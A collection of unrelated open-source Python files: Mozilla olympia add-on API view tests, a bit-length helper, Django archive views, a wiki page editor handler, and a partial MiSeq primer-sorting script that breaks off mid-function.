len(data['results']) == 2 assert data['results'][0]['id'] == addon1.pk assert data['results'][1]['id'] == addon2.pk @patch('olympia.addons.views.get_featured_ids') def test_app_and_type(self, get_featured_ids_mock): addon1 = addon_factory() addon2 = addon_factory() get_featured_ids_mock.return_value = [addon1.pk, addon2.pk] response = self.client.get(self.url, { 'app': 'firefox', 'type': 'extension' }) assert get_featured_ids_mock.call_count == 1 assert (get_featured_ids_mock.call_args_list[0][0][0] == amo.FIREFOX) # app assert (get_featured_ids_mock.call_args_list[0][1] == {'types': [amo.ADDON_EXTENSION], 'lang': None}) assert response.status_code == 200 data = json.loads(response.content) assert data['results'] assert len(data['results']) == 2 assert data['results'][0]['id'] == addon1.pk assert data['results'][1]['id'] == addon2.pk @patch('olympia.addons.views.get_featured_ids') def test_app_and_types(self, get_featured_ids_mock): addon1 = addon_factory() addon2 = addon_factory() get_featured_ids_mock.return_value = [addon1.pk, addon2.pk] response = self.client.get(self.url, { 'app': 'firefox', 'type': 'extension,theme' }) assert get_featured_ids_mock.call_count == 1 assert (get_featured_ids_mock.call_args_list[0][0][0] == amo.FIREFOX) # app assert (get_featured_ids_mock.call_args_list[0][1] == {'types': [amo.ADDON_EXTENSION, amo.ADDON_THEME], 'lang': None}) assert response.status_code == 200 data = json.loads(response.content) assert data['results'] assert len(data['results']) == 2 assert data['results'][0]['id'] == addon1.pk assert data['results'][1]['id'] == addon2.pk @patch('olympia.addons.views.get_featured_ids') def test_app_and_type_and_lang(self, get_featured_ids_mock): addon1 = addon_factory() addon2 = addon_factory() get_featured_ids_mock.return_value = [addon1.pk, addon2.pk] response = self.client.get(self.url, { 'app': 'firefox', 'type': 'extension', 'lang': 'es' }) assert get_featured_ids_mock.call_count == 1 assert (get_featured_ids_mock.call_args_list[0][0][0] == amo.FIREFOX) # app assert (get_featured_ids_mock.call_args_list[0][1] == {'types': [amo.ADDON_EXTENSION], 'lang': 'es'}) assert response.status_code == 200 data = json.loads(response.content) assert data['results'] assert len(data['results']) == 2 assert data['results'][0]['id'] == addon1.pk assert data['results'][1]['id'] == addon2.pk def test_invalid_app(self): response = self.client.get( self.url, {'app': 'foxeh', 'type': 'extension'}) assert response.status_code == 400 assert json.loads(response.content) == { 'detail': 'Invalid app, category and/or type parameter(s).'} def test_invalid_type(self): response = self.client.get(self.url, {'app': 'firefox', 'type': 'lol'}) assert response.status_code == 400 assert json.loads(response.content) == { 'detail': 'Invalid app, category and/or type parameter(s).'} def test_category_no_app_or_type(self): response = self.client.get(self.url, {'category': 'lol'}) assert response.status_code == 400 assert json.loads(response.content) == { 'detail': 'Invalid app, category and/or type parameter(s).'} def test_invalid_category(self): response = self.client.get(self.url, { 'category': 'lol', 'app': 'firefox', 'type': 'extension' }) assert response.status_code == 400 assert json.loads(response.content) == { 'detail': 'Invalid app, category and/or type parameter(s).'} @patch('olympia.addons.views.get_creatured_ids') def test_category(self, get_creatured_ids_mock): addon1 = addon_factory() addon2 = addon_factory() get_creatured_ids_mock.return_value = [addon1.pk, addon2.pk] response = self.client.get(self.url, { 'category': 'alerts-updates', 'app': 'firefox', 'type': 'extension' }) assert get_creatured_ids_mock.call_count == 1 assert get_creatured_ids_mock.call_args_list[0][0][0] == 72 # category assert get_creatured_ids_mock.call_args_list[0][0][1] is None # lang assert response.status_code == 200 data = json.loads(response.content) assert data['results'] assert len(data['results']) == 2 assert data['results'][0]['id'] == addon1.pk assert data['results'][1]['id'] == addon2.pk @patch('olympia.addons.views.get_creatured_ids') def test_category_with_multiple_types(self, get_creatured_ids_mock): addon1 = addon_factory() addon2 = addon_factory() get_creatured_ids_mock.return_value = [addon1.pk, addon2.pk] response = self.client.get(self.url, { 'category': 'nature', 'app': 'firefox', 'type': 'persona,statictheme' }) assert get_creatured_ids_mock.call_count == 2 assert get_creatured_ids_mock.call_args_list[0][0][0] == 102 # cat assert get_creatured_ids_mock.call_args_list[0][0][1] is None # lang assert get_creatured_ids_mock.call_args_list[1][0][0] == 302 # cat assert get_creatured_ids_mock.call_args_list[1][0][1] is None # lang assert response.status_code == 200 data = json.loads(response.content) assert data['results'] assert len(data['results']) == 2 assert data['results'][0]['id'] == addon1.pk assert data['results'][1]['id'] == addon2.pk @patch('olympia.addons.views.get_creatured_ids') def test_category_with_lang(self, get_creatured_ids_mock): addon1 = addon_factory() addon2 = addon_factory() get_creatured_ids_mock.return_value = [addon1.pk, addon2.pk] response = self.client.get(self.url, { 'category': 'alerts-updates', 'app': 'firefox', 'type': 'extension', 'lang': 'fr', }) assert get_creatured_ids_mock.call_count == 1 assert get_creatured_ids_mock.call_args_list[0][0][0] == 72 # cat id. assert get_creatured_ids_mock.call_args_list[0][0][1] == 'fr' # lang assert response.status_code == 200 data = json.loads(response.content) assert data['results'] assert len(data['results']) == 2 assert data['results'][0]['id'] == addon1.pk assert data['results'][1]['id'] == addon2.pk class TestStaticCategoryView(TestCase): client_class = APITestClient def setUp(self): super(TestStaticCategoryView, self).setUp() self.url = reverse_ns('category-list') def test_basic(self): with self.assertNumQueries(0): response = self.client.get(self.url) assert response.status_code == 200 data = json.loads(response.content) assert len(data) == 113 # some basic checks to verify integrity entry = data[0] assert entry == { u'name': u'Feeds, News & Blogging', u'weight': 0, u'misc': False, u'id': 1, u'application': u'firefox', u'description': None, u'type': u'extension', u'slug': u'feeds-news-blogging' } def test_with_description(self): # StaticCategory is immutable, so avoid calling it's __setattr__ # directly. object.__setattr__(CATEGORIES_BY_ID[1], 'description', u'does stuff') with self.assertNumQueries(0): response = self.client.get(self.url) assert response.status_code == 200 data = json.loads(response.content) assert len(data) == 113 # some basic checks to verify integrity entry = data[0] assert entry == { u'name': u'Feeds, News & Blogging', u'weight': 0, u'misc': False, u'id': 1, u'application': u'firefox', u'description': u'does stuff', u'type': u'extension', u'slug': u'feeds-news-blogging' } @pytest.mark.needs_locales_compilation def test_name_translated(self): with self.assertNumQueries(0): response = self.client.get(self.url, HTTP_ACCEPT_LANGUAGE='de') assert response.status_code == 200 data = json.loads(response.content) assert data[0]['name'] == 'RSS-Feeds, Nachrichten & Bloggen' def test_cache_control(self): response = self.client.get(self.url) assert response.status_code == 200 assert response['cache-control'] == 'max-age=21600' class TestLanguageToolsView(TestCase): client_class = APITestClient def setUp(self): super(TestLanguageToolsView, self).setUp() self.url = reverse_ns('addon-language-tools') def test_wrong_app_or_no_app(self): response = self.client.get(self.url) assert response.status_code == 400 assert response.data == { 'detail': u'Invalid or missing app parameter.'} response = self.client.get(self.url, {'app': 'foo'}) assert response.status_code == 400 assert response.data == { 'detail': u'Invalid or missing app parameter.'} def test_basic(self): dictionary = addon_factory(type=amo.ADDON_DICT, target_locale='fr') dictionary_spelling_variant = addon_factory( type=amo.ADDON_DICT, target_locale='fr', locale_disambiguation='For spelling reform') language_pack = addon_factory( type=amo.ADDON_LPAPP, target_locale='es', file_kw={'strict_compatibility': True}, version_kw={'min_app_version': '57.0', 'max_app_version': '57.*'}) # These add-ons below should be ignored: they are either not public or # of the wrong type, not supporting the app we care about, or their # target locale is empty. addon_factory( type=amo.ADDON_LPAPP, target_locale='de', version_kw={'application': amo.THUNDERBIRD.id}) addon_factory( type=amo.ADDON_DICT, target_locale='fr', version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED}) addon_factory( type=amo.ADDON_LPAPP, target_locale='es', file_kw={'status': amo.STATUS_AWAITING_REVIEW}, status=amo.STATUS_NOMINATED) addon_factory(type=amo.ADDON_DICT, target_locale='') addon_factory(type=amo.ADDON_LPAPP, target_locale=None) addon_factory(target_locale='fr') response = self.client.get(self.url, {'app': 'firefox'}) assert response.status_code == 200 data = json.loads(response.content) assert len(data['results']) == 3 expected = [dictionary, dictionary_spelling_variant, language_pack] assert len(data['results']) == len(expected) assert ( set(item['id'] for item in data['results']) == set(item.pk for item in expected)) assert 'locale_disambiguation' in data['results'][0] assert 'target_locale' in data['results'][0] # We were not filtering by appversion, so we do not get the # current_compatible_version property. assert 'current_compatible_version' not in data['results'][0] def test_with_appversion_but_no_type(self): response = self.client.get( self.url, {'app': 'firefox', 'appversion': '57.0'}) assert response.status_code == 400 assert response.data == { 'detail': 'Invalid or missing type parameter while appversion ' 'parameter is set.'} def test_with_invalid_appversion(self): response = self.client.get( self.url, {'app': 'firefox', 'type': 'language', 'appversion': u'foôbar'}) assert response.status_code == 400 assert response.data == {'detail': 'Invalid appversion parameter.'} def test_with_author_filtering(self): user = user_factory(username=u'mozillä') addon1 = addon_factory(type=amo.ADDON_LPAPP, target_locale='de') addon2 = addon_factory(type=amo.ADDON_LPAPP, target_locale='fr') AddonUser.objects.create(addon=addon1, user=user) AddonUser.objects.create(addon=addon2, user=user) # These 2 should not show up: it's either not the right author, or # the author is not listed. addon3 = addon_factory(type=amo.ADDON_LPAPP, target_locale='es') AddonUser.objects.create(addon=addon3, user=user, listed=False) addon_factory(type=amo.ADDON_LPAPP, target_locale='it') response = self.client.get( self.url, {'app': 'firefox', 'type': 'language', 'author': u'mozillä'}) assert response.status_code == 200 data = json.loads(response.content) expected = [addon1, addon2] assert len(data['results']) == len(expected) assert ( set(item['id'] for item in data['results']) == set(item.pk for item in expected)) def test_with_multiple_authors_filtering(self): user1 = user_factory(username=u'mozillä') user2 = user_factory(username=u'firefôx') addon1 = addon_factory(type=amo.ADDON_LPAPP, target_locale='de') addon2 = addon_factory(type=amo.ADDON_LPAPP, target_locale='fr') AddonUser.objects.create(addon=addon1, user=user1) AddonUser.objects.create(addon=addon2, user=user2) # These 2 should not show up: it's either not the right author, or # the author is not listed. addon3 = addon_factory(type=amo.ADDON_LPAPP, target_locale='es') AddonUser.objects.create(addon=addon3, user=user1, listed=False) addon_factory(type=amo.ADDON_LPAPP, target_locale='it') response = self.client.get( self.url, {'app': 'firefox', 'type': 'language', 'author': u'mozillä,firefôx'}) assert response.status_code == 200 data = json.loads(response.content) expected = [addon1, addon2] assert len(data['results']) == len(expected) assert ( set(item['id'] for item in data['results']) == set(item.pk for item in expected)) def test_with_appversion_filtering(self): # Add compatible add-ons. We're going to request language packs # compatible with 58.0. compatible_pack1 = addon_factory( name='Spanish Language Pack', type=amo.ADDON_LPAPP, target_locale='es', file_kw={'strict_compatibility': True}, version_kw={'min_app_version': '57.0', 'max_app_version': '57.*'}) compatible_pack1.current_version.update(created=self.days_ago(2)) compatible_version1 = version_factory( addon=compatible_pack1, file_kw={'strict_compatibility': True}, min_app_version='58.0', max_app_version='58.*') compatible_version1.update(created=self.days_ago(1)) compatible_pack2 = addon_factory( name='French Language Pack', type=amo.ADDON_LPAPP, target_locale='fr', file_kw={'strict_compatibility': True}, version_kw={'min_app_version': '58.0', 'max_app_version': '58.*'}) compatible_version2 = compatible_pack2.current_version compatible_version2.update(created=self.days_ago(1)) version_factory( addon=compatible_pack2, file_kw={'strict_compatibility': True}, min_app_version='59.0', max_app_version='59.*') # Add a more recent version for both add-ons, that would be compatible # with 58.0, but is not public/listed so should not be returned. version_factory( addon=compatible_pack1, file_kw={'strict_compatibility': True}, min_app_version='58.0', max_app_version='58.*', channel=amo.RELEASE_CHANNEL_UNLISTED) version_factory( addon=compatible_pack2, file_kw={'strict_compatibility': True, 'status': amo.STATUS_DISABLED}, min_app_version='58.0', max_app_version='58.*') # And for the first pack, add a couple of versions that are also # compatible. We should not use them though, because we only need to # return the latest public version that is compatible. extra_compatible_version_1 = version_factory( addon=compatible_pack1, file_kw={'strict_compatibility': True}, min_app_version='58.0', max_app_version='58.*') extra_compatible_version_1.update(created=self.days_ago(3)) extra_compatible_version_2 = version_factory( addon=compatible_pack1, file_kw={'strict_compatibility': True}, min_app_version='58.0', max_app_version='58.*') extra_compatible_version_2.update(created=self.days_ago(4)) # Add a few of incompatible add-ons. incompatible_pack1 = addon_factory( name='German Language Pack (incompatible with 58.0)', type=amo.ADDON_LPAPP, target_locale='fr', file_kw={'strict_compatibility': True}, version_kw={'min_app_version': '56.0', 'max_app_version': '56.*'}) version_factory( addon=incompatible_pack1, file_kw={'strict_compatibility': True}, min_app_version='59.0', max_app_version='59.*') addon_factory( name='Italian Language Pack (incompatible with 58.0)', type=amo.ADDON_LPAPP, target_locale='it', file_kw={'strict_compatibility': True}, version_kw={'min_app_version': '59.0', 'max_app_version': '59.*'}) addon_factory( name='Thunderbird Polish Language Pack', type=amo.ADDON_LPAPP, target_locale='pl', file_kw={'strict_compatibility': True}, version_kw={ 'application': amo.THUNDERBIRD.id, 'min_app_version': '58.0', 'max_app_version': '58.*'}) # Even add a pack with a compatible version... not public. And another # one with a compatible version... not listed. incompatible_pack2 = addon_factory( name='Japanese Language Pack (public, but 58.0 version is not)', type=amo.ADDON_LPAPP, target_locale='ja', file_kw={'strict_compatibility': True}, version_kw={'min_app_version': '57.0', 'max_app_version': '57.*'}) version_factory( addon=incompatible_pack2, min_app_version='58.0', max_app_version='58.*', file_kw={'status': amo.STATUS_AWAITING_REVIEW, 'strict_compatibility': True}) incompatible_pack3 = addon_factory( name='Nederlands Language Pack (58.0 version is unlisted)', type=amo.ADDON_LPAPP, target_locale='ja', file_kw={'strict_compatibility': True}, version_kw={'min_app_version': '57.0', 'max_app_version': '57.*'}) version_factory( addon=incompatible_pack3, min_app_version='58.0', max_app_version='58.*', channel=amo.RELEASE_CHANNEL_UNLISTED, file_kw={'strict_compatibility': True}) # Test it. with self.assertNumQueries(5): # 5 queries, regardless of how many add-ons are returned: # - 1 for the add-ons # - 1 for the add-ons translations (name) # - 1 for the compatible versions (through prefetch_related) # - 1 for the applications versions for those versions # (we don't need it, but we're using the default Version # transformer to get the files... this could be improved.) # - 1 for the files for those versions response = self.client.get( self.url, {'app': 'firefox', 'appversion': '58.0', 'type': 'language', 'lang': 'en-US'}) assert response.status_code == 200, response.content results = response.data['results'] assert len(results) == 2 # Ordering is not guaranteed by this API, but do check that the # current_compatible_version returned makes sense. assert results[0]['current_compatible_version'] assert results[1]['current_compatible_version'] expected_versions = set(( (compatible_pack1.pk, compatible_version1.pk), (compatible_pack2.pk, compatible_version2.pk), )) returned_versions = set(( (results[0]['id'], results[0]['current_compatible_version']['id']), (results[1]['id'], results[1]['current_compatible_version']['id']), )) assert expected_versions == returned_versions def test_memoize(self): addon_factory(type=amo.ADDON_DICT, target_locale='fr') addon_factory( type=amo.ADDON_DICT, target_locale='fr', locale_disambiguation='For spelling reform') addon_factory(type=amo.ADDON_LPAPP, target_locale='es') addon_factory( type=amo.ADDON_LPAPP, target_locale='de', version_kw={'application': amo.THUNDERBIRD.id}) with self.assertNumQueries(2): response = self.client.get( self.url, {'app': 'firefox', 'lang': 'fr'}) assert response.status_code == 200 assert len(json.loads(response.content)['results']) == 3 # Same again, should be cached; no queries. with self.assertNumQueries(0): assert self.client.get( self.url, {'app': 'firefox', 'lang': 'fr'}).content == ( response.content ) with self.assertNumQueries(2): assert ( self.client.get( self.url, {'app': 'thunderbird', 'lang': 'fr'}).content != response.content ) # Same again, should be cached; no queries. with self.assertNumQueries(0): self.client.get(self.url, {'app': 'thunderbird', 'lang': 'fr'}) # Change the lang, we should get queries again. with self.assertNumQueries(2): self.client.get(self.url, {'app': 'firefox', 'lang': 'de'}) class TestReplacementAddonView(TestCase): client_class = APITestClient def test_basic(self): # Add a single addon replacement rep_addon1 = addon_factory() ReplacementAddon.objects.create( guid='legacy2addon@moz', path=urlunquote(rep_addon1.get_url_path())) # Add a collection replacement author = user_factory() collection = collection_factory(author=author) rep_addon2 = addon_factory() rep_addon3 = addon_factory() collection.set_addons([rep_addon2.id, rep_addon3.id]) ReplacementAddon.objects.create( guid='legacy2collection@moz', path=urlunquote(collection.get_url_path())) # Add an invalid path ReplacementAddon.objects.create( guid='notgonnawork@moz', path='/addon/áddonmissing/') response = self.client.get(reverse_ns('addon-replacement-addon')) assert response.status_code == 200 data = json.loads(response.content) results = data['results'] assert len(results) == 3 assert ({'guid': 'legacy2addon@moz', 'replacement': [rep_addon1.guid]} in results) assert ({'guid': 'legacy2collection@moz', 'replacement': [rep_addon2.guid, rep_addon3.guid]} in results) assert ({'guid': 'notgonnawork@moz', 'replacement': []} in results) class TestCompatOverrideView(TestCase): client_class = APITestClient def setUp(self): self.addon = addon_factory(guid='extrabad@thing') self.override_addon = CompatOverride.objects.create( name='override with addon', guid=self.addon.guid, addon=self.addon) CompatOverrideRange.objects.create( compat=self.override_addon, app=amo.FIREFOX.id) self.override_without = CompatOverride.objects.create( name='override no addon', guid='bad@thing') CompatOverrideRange.objects.create( compat=self.override_without, app=amo.FIREFOX.id) def test_single_guid(self): response = self.client.get( reverse_ns('addon-compat-override'), data={'guid': u'extrabad@thing'}) assert response.status_code == 200 data = json.loads(response.content) assert len(data['results']) == 1 result = data['results'][0] assert result['addon_guid'] == 'extrabad@thing' assert result['addon_id'] == self.addon.id assert result['name'] == 'override with addon' def test_multiple_guid(self): response = self.client.get( reverse_ns('addon-compat-override'), data={'guid': u'extrabad@thing,bad@thing'}) assert response.status_code == 200 data = json.loads(response.content) results = data['results'] assert len(results) == 2 assert results[0]['addon_guid'] == 'bad@thing' assert results[0]['addon_id'] is None assert results[0]['name'] == 'override no addon' assert results[1]['addon_guid'] == 'extrabad@thing' assert results[1]['addon_id'] == self.addon.id assert results[1]['name'] == 'override with addon' # Throw in some random invalid guids too that will be ignored. response = self.client.get( reverse_ns('addon-compat-override'), data={'guid': ( u'extrabad@thing,invalid@guid,notevenaguid$,bad@thing')}) assert response.status_code == 200 data = json.loads(response.content) results = data['results'] assert len(results) == 2 assert results[0]['addon_guid'] == 'bad@thing' assert results[1]['addon_guid'] == 'extrabad@thing' def test_no_guid_param(self): response = self.client.get( reverse_ns('addon-compat-override'), data={'guid': u'invalid@thing'}) # Searching for non-matching guids, it should be an empty 200 response. assert response.status_code == 200 assert len(json.loads(response.content)['results']) == 0 response = self.client.get( reverse_ns('addon-compat-override'), data={'guid': ''}) # Empty query is a 400 because a guid is required for overrides. assert response.status_code == 400 assert 'Empty, or no, guid parameter provided.' in response.content response = self.client.get( reverse_ns('addon-compat-override')) # And no guid param should be a 400 too assert response.status_code == 400 assert 'Empty, or no, guid parameter provided.' in response.content class TestAddonRecommendationView(ESTestCase): client_class = APITestClient fixtures = ['base/users'] def setUp(self): super(TestAddonRecommendationView, self).setUp() self.url = reverse_ns('addon-recommendations') patcher = mock.patch( 'olympia.addons.views.get_addon_recommendations') self.get_recommendations_mock = patcher.start() self.addCleanup(patcher.stop) def tearDown(self): super(TestAddonRecommendationView, self).tearDown() self.empty_index('default') self.refresh() def perform_search(self, url, data=None, expected_status=200, **headers): with self.assertNumQueries(0): response = self.client.get(url, data, **headers) assert response.status_code == expected_status, response.content data = json.loads(response.content) return data def test_basic(self): addon1 = addon_factory(id=101, guid='101@mozilla') addon2 = addon_factory(id=102, guid='102@mozilla') addon3 = addon_factory(id=103, guid='103@mozilla') addon4 = addon_factory(id=104, guid='104@mozilla') self.get_recommendations_mock.return_value = ( ['101@mozilla', '102@mozilla', '103@mozilla', '104@mozilla'], 'recommended', 'no_reason') self.refresh() data = self.perform_search( self.url, {'guid': 'foo@baa', 'recommended': 'False'}) self.get_recommendations_mock.assert_called_with('foo@baa', False) assert data['outcome'] == 'recommended' assert data['fallback_reason'] == 'no_reason' assert data['count'] == 4 assert len(data['results']) == 4 result = data['results'][0] assert result['id'] == addon1.pk assert result['guid'] == '101@mozilla' result = data['results'][1] assert result['id'] == addon2.pk assert result['guid'] == '102@mozilla' result = data['results'][2] assert result['id'] == addon3.pk assert result['guid'] == '103@mozilla' result = data['results'][3] assert result['id'] == addon4.pk assert result['guid'] == '104@mozilla' @mock.patch('olympia.addons.views.get_addon_recommendations_invalid') def test_less_than_four_results(self, get_addon_recommendations_invalid): addon1 = addon_factory(id=101, guid='101@mozilla') addon2 = addon_factory(id=102, guid='102@mozilla') addon3 = addon_factory(id=103, guid='103@mozilla') addon4 = addon_factory(id=104, guid='104@mozilla') addon5 = addon_factory(id=105, guid='105@mozilla') addon6 = addon_factory(id=106, guid='106@mozilla') addon7 = addon_factory(id=107, guid='107@mozilla') addon8 = addon_factory(id=108, guid='108@mozilla') self.get_recommendations_mock.return_value = ( ['101@mozilla', '102@mozilla', '103@mozilla', '104@mozilla'], 'recommended', None) get_addon_recommendations_invalid.return_value = ( ['105@mozilla', '106@mozilla', '107@mozilla', '108@mozilla'], 'failed', 'invalid') self.refresh() data = self.perform_search( self.url, {'guid': 'foo@baa', 'recommended': 'True'}) self.get_recommendations_mock.assert_called_with('foo@baa', True) assert data['outcome'] == 'recommended' assert data['fallback_reason'] is None assert data['count'] == 4 assert len(data['results']) == 4 result = data['results'][0] assert result['id'] == addon1.pk assert result['guid'] == '101@mozilla' result = data['results'][1] assert result['id'] == addon2.pk assert result['guid'] == '102@mozilla' result = data['results'][2] assert result['id'] == addon3.pk assert result['guid'] == '103@mozilla' result = data['results'][3] assert result['id'] == addon4.pk assert result['guid'] == '104@mozilla' # Delete one of the add-ons returned, making us use curated fallbacks addon1.delete() self.refresh() data = self.perform_search( self.url, {'guid': 'foo@baa', 'recommended': 'True'}) self.get_recommendations_mock.assert_called_with('foo@baa', True) assert data['outcome'] == 'failed' assert data['fallback_reason'] == 'invalid' assert data['count'] == 4 assert len(data['results']) == 4 result = data['results'][0] assert result['id'] == addon5.pk assert result['guid'] == '105@mozilla' result = data['results'][1] assert result['id'] == addon6.pk assert result['guid'] == '106@mozilla' result = data['results'][2] assert result['id'] == addon7.pk assert result['guid'] == '107@mozilla' result = data['results'][3] assert result['id'] == addon8.pk assert result['guid'] == '108@mozilla' def test_es_queries_made_no_results(self): self.get_recommendations_mock.return_value = ( ['@a', '@b'], 'foo', 'baa') with patch.object( Elasticsearch, 'search', wraps=amo.search.get_es().search) as search_mock: with patch.object( Elasticsearch, 'count', wraps=amo.search.get_es().count) as count_mock: data = self.perform_search(self.url, data={'guid': '@foo'}) assert data['count'] == 0 assert len(data['results']) == 0 assert search_mock.call_count == 1 assert count_mock.call_count == 0 def test_es_queries_made_results(self): addon_factory(slug='foormidable', name=u'foo', guid='@a') addon_factory(slug='foobar', name=u'foo', guid='@b') addon_factory(slug='fbar', name=u'foo', guid='@c') addon_factory(slug='fb', name=u'foo', guid='@d') self.refresh() self.get_recommendations_mock.return_value = ( ['@a', '@b', '@c', '@d'], 'recommended', None) with patch.object( Elasticsearch, 'search', wraps=amo.search.get_es().search) as search_mock: with patch.object( Elasticsearch, 'count', wraps=amo.search.get_es().count) as count_mock: data = self.perform_search( self.url, data={'guid': '@foo', 'recommended': 'true'}) assert data['count'] == 4 assert len(data['results']) == 4 assert search_mock.call_count == 1 assert count_mock.call_count == 0
lavish205/olympia
src/olympia/addons/tests/test_views.py
Python
bsd-3-clause
160,052
# coding: utf-8 # Copyright (C) 2017 Open Path View, Maison Du Libre # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License along # with this program. If not, see <http://www.gnu.org/licenses/>. # Contributors: Benjamin BERNARD <benjamin.bernard@openpathview.fr> # Email: team@openpathview.fr # Description: Utils for makelot. def bit_len(int_type: int) -> int: """ Returns int_type length, position of last non 0 bit. :param int_type: An int value. :type int_type: int :return: position of last non 0 bit. :rtype: int """ length = 0 while (int_type): int_type >>= 1 length += 1 return(length)
OpenPathView/batchPanoMaker
opv_import/helpers/bit_utils.py
Python
gpl-3.0
1,156
from django.views.generic import ListView, DetailView, CreateView, \ DeleteView, UpdateView, \ ArchiveIndexView, DateDetailView, \ DayArchiveView, MonthArchiveView, \ TodayArchiveView, WeekArchiveView, \ YearArchiveView from baseapp.models import Class_Studying from django.contrib import auth, messages class Class_StudyingView(object): model = Class_Studying def get_template_names(self): """Nest templates within class_studying directory.""" tpl = super(Class_StudyingView, self).get_template_names()[0] app = self.model._meta.app_label mdl = 'class_studying' self.template_name = tpl.replace(app, '{0}/{1}'.format(app, mdl)) return [self.template_name] class Class_StudyingDateView(Class_StudyingView): date_field = 'created_date' month_format = '%m' class Class_StudyingBaseListView(Class_StudyingView): paginate_by = 10 class Class_StudyingArchiveIndexView( Class_StudyingDateView, Class_StudyingBaseListView, ArchiveIndexView): def get_success_url(self): from django.core.urlresolvers import reverse return reverse('baseapp_class_studying_list') class Class_StudyingCreateView(Class_StudyingView, CreateView): def get_success_url(self): from django.core.urlresolvers import reverse messages.add_message( self.request, messages.SUCCESS,"Successfully created." ) return reverse('baseapp_class_studying_list') class Class_StudyingDateDetailView(Class_StudyingDateView, DateDetailView): def get_success_url(self): from django.core.urlresolvers import reverse return reverse('baseapp_class_studying_list') class Class_StudyingDayArchiveView( Class_StudyingDateView, Class_StudyingBaseListView, DayArchiveView): def get_success_url(self): from django.core.urlresolvers import reverse return reverse('baseapp_class_studying_list') class Class_StudyingDeleteView(Class_StudyingView, DeleteView): def get_success_url(self): from django.core.urlresolvers import reverse return reverse('baseapp_class_studying_list') class Class_StudyingDetailView(Class_StudyingView, DetailView): def get_success_url(self): from django.core.urlresolvers import reverse return reverse('baseapp_class_studying_list') class Class_StudyingListView(Class_StudyingBaseListView, ListView): def get_success_url(self): from django.core.urlresolvers import reverse return reverse('baseapp_class_studying_list') class Class_StudyingMonthArchiveView( Class_StudyingDateView, Class_StudyingBaseListView, MonthArchiveView): def get_success_url(self): from django.core.urlresolvers import reverse return reverse('baseapp_class_studying_list') class Class_StudyingTodayArchiveView( Class_StudyingDateView, Class_StudyingBaseListView, TodayArchiveView): def get_success_url(self): from django.core.urlresolvers import reverse return reverse('baseapp_class_studying_list') class Class_StudyingUpdateView(Class_StudyingView, UpdateView): def get_success_url(self): from django.core.urlresolvers import reverse return reverse('baseapp_class_studying_list') class Class_StudyingWeekArchiveView( Class_StudyingDateView, Class_StudyingBaseListView, WeekArchiveView): def get_success_url(self): from django.core.urlresolvers import reverse return reverse('baseapp_class_studying_list') class Class_StudyingYearArchiveView( Class_StudyingDateView, Class_StudyingBaseListView, YearArchiveView): make_object_list = True
tnemis/staging-server
baseapp/views/class_studying_views.py
Python
mit
3,912
from authenticated import AuthenticatedHandler import models import logging class EditPage(AuthenticatedHandler): def auth_get(self, page_path): self.render_form(page_path) def auth_post(self, page_path): page_id = self.request.get('v') page_content = self.request.get('content') wikipage = models.WikiPage.by_path_or_id(page_path, page_id) if wikipage and page_content == wikipage.content: self.redirect(page_path) return models.WikiPage.create(page_path = page_path, page_content = page_content, author = self.account) self.redirect(page_path) def render_form(self, page_path): version = self.request.get('v') wikipage = models.WikiPage.by_path_or_id(page_path, version) self.render('edit_page', editing = True, page_title = 'WikiPage: %s' % page_path, page_path = page_path, page_version = version, page_html = wikipage.content if wikipage else '', is_new_page = not wikipage)
zxul767/Wikipages
edit.py
Python
gpl-2.0
1,154
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Script to separate genes from MiSeq run fastQ files (NEXTERA style) AFTER the reads have been trimmed for the tail and adapter (see trim_adaptors.py) Trim forward and reverse primers. It will produce one file for each gene (4 here - 16S, 18S, UPA, tufA) Created on Mon Jul 28 17:27:33 2014 @author: VanessaRM """ """ USAGE: python speratae_genes.py my_fastq_file.fastq """ from Bio import SeqIO import regex import sys # Help text if len(sys.argv) == 1: print "" print "Script to separate genes and trim primers from a fastQ file." print "Allows one mismatch in the primer sequence" print "" print "Usage: supply the file name" print "ex: python speratae_genes.py my_fastq_file.fastq" print "" print "If you want to run it for multiple files, use the shell:" print "for file in *_R1_001.fastq; do python separate_genes.py $file; done >> screen.out 2>> screen.err &" print "" sys.exit() # input files and arguments: input_file = str(sys.argv[1]) output_file_16S = input_file + "_16S.fastq" output_file_18S = input_file + "_18S.fastq" output_file_UPA = input_file + "_UPA.fastq" output_file_tufA = input_file + "_tufA.fastq" output_file_umatched = input_file + "_unmatched.fastq" # Globals finder = "" # Create lists to store seqs #all_seqs =[] #just to see if the code behaves well s16_list =[] s18_list = [] UPA_list=[] tufA_list =[] unmatched=[] # Forward Primers (\w = ambiguous positions, only 12 "internal" bases used), allowing for 1 mismatch. p16S_f = '(GTGCCAGC\wGCCGCGGTAA){e<=1}' #F515 p18S_f = '(GGTGGTGCATGGCCGTTCTTAGTT){e<=1}' #NF1 pUPA_f = '(GGACAGAAAGACCCTATGAA){e<=1}' #p23SrV_f1 ptufA_f = '(AC\wGG\wCG\wGG\wAC\wGT){e<=1}' #Oq_tuf2F #Reverse primers(their reverse complement): p16S_r = '(ATTAGA\wACCC\w\wGTAGTCC){e<=1}' #R806 rc ATTAGAWACCCBDGTAGTCC p18S_r = '(ATTACGTCCCTGCCCTTTGTA){e<=1}' # B18Sr2B rc pUPA_r = '(CTCTAGGGATAACAGGCTGA){e<=1}' #p23SrV_r1 rc ptufA_r = '(GCG\wTT\wGC\wATTCG\wGAAGG){e<=1}' #tufAR rc #define primer_finder function def primer_finder (records, primer_f1, primer_r1, primer_f2, primer_r2, primer_f3, primer_r3, primer_f4, primer_r4): "Trims the primers and saves the sequences in amplicon-separated files. Put primers in order: 16S, 18S, UPA, tufA" for record in records: sequence = str(record.seq) #Initial values of cut_off - in case you don't need to trim anything cut_off_f= 0 cut_off_r = len(sequence) #Search the primers f and r index_f = regex.search((primer_f1), sequence) index_r = regex.search((primer_r1), sequence) if index_f != None: #found the forward primer, so define where the sequence needs to be trimmed cut_off_f = int(index_f.span()[1]) if index_r != None: #found the reverse primer cut_off_r = int(index_r.span()[0]+1) #the +1 is to cut just when the primer starts. #Store the trimmed seq if index_f or index_r != None: s16_list.append(record [cut_off_f:cut_off_r]) else: #search for next primer index_f = regex.search((primer_f2), sequence) index_r = 